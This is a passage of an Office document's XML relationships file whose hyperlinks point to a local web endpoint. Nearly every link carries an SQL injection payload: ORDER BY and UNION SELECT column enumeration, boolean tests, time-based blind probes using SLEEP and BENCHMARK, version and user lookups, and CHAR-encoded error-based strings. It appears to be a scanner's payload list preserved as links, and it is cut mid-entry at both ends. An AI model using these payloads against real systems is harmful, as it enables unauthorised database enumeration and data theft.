Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId47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%23" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AS%20INJECTX%20WHERE%201=1%20AND%201=0--" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2028%20" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL--%20" TargetMode="External"/><Relationship Id="rId543" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12--%20" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%205%23%20" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3AnD%20SLEEP(5)" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14" TargetMode="External"/><Relationship Id="rId378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" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23" TargetMode="External"/><Relationship Id="rId585" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%23" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=x" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--%20" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))--%20" TargetMode="External"/><Relationship Id="rId487" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201%23" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15%23" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--%20" TargetMode="External"/><Relationship Id="rId512" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%205--%20" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2016%23%20" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=0%20AND%20'%25'='" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12%23" TargetMode="External"/><Relationship Id="rId554" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--%20" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9%23" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--%20" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId45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--%20" TargetMode="External"/><Relationship Id="rId498" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(SELECT%20CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(5650=5650)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=y--%20" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%208%20" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--%20" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23" TargetMode="External"/><Relationship Id="rId523" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2016--%20" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2027%23%20" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2019%20" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10" TargetMode="External"/><Relationship Id="rId565" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4%23" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20and%20(select%20substring(@@version,1,1))='M'" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%23" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))%23" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201=1%23" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2027--%20" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2030%20" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7--%20" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21" TargetMode="External"/><Relationship Id="rId534" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3--%20" TargetMode="External"/><Relationship Id="rId576" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15%23" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%23" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),%22'3'%22%23" TargetMode="External"/><Relationship Id="rId43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--%20" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--%20" TargetMode="External"/><Relationship Id="rId478" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL%20" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%207%23%20" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2030%23" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20" TargetMode="External"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2" TargetMode="External"/><Relationship Id="rId545" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14--%20" TargetMode="External"/><Relationship Id="rId587" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%23" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20OR%20x=x%23" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3AnD%20SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14%23" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))--%20" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--%20" TargetMode="External"/><Relationship Id="rId48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" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%207--%20" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3%23" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%20" TargetMode="External"/><Relationship Id="rId514" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13" TargetMode="External"/><Relationship Id="rId556" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2018%23%20" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2010%20" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201083=1083%20AND%20('1427=1427" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11%23" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL--%20" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21%23" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL%23" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20HAVING%201=0" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2018--%20" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" TargetMode="External"/><Relationship Id="rId525" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24" TargetMode="External"/><Relationship Id="rId567" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6%23" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2029%23%20" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2021%20" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%25'%20AND%208310=8311%20AND%20'%25'='" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23" TargetMode="External"/><Relationship Id="rId42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--%20" TargetMode="External"/><Relationship Id="rId46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%23" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20AND%201083=1083%20AND%20(1427=1427" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)--%20" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9--%20" TargetMode="External"/><Relationship Id="rId480" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20AND%205650=CONVERT(INT,(UNION%20ALL%20SELECTCHAR(88)+CHAR(88)))" TargetMode="External"/><Relationship Id="rId536" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5--%20" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20ORDER%20BY%2029--%20" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3IF(7423=7424)%20SELECT%207423%20ELSE%20DROP%20FUNCTION%20xcjl--" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--%20" TargetMode="External"/><Relationship Id="rId578" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5)%23" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20SELECT%20@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5%23" TargetMode="External"/><Relationship Id="rId438" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20NULL--%20" TargetMode="External"/><Relationship Id="rId242" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20ORDER%20BY%201,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--%20" TargetMode="External"/><Relationship Id="rId284" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24" TargetMode="External"/><Relationship Id="rId49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" TargetMode="External"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=%20UNION%20ALL%20SELECT%20'INJ'%7C%7C'ECT'%7C%7C'XXX',2,3,4" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://localhost:9999/category/view?id=3%20WHERE%201=1%20AND%201=0%23" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 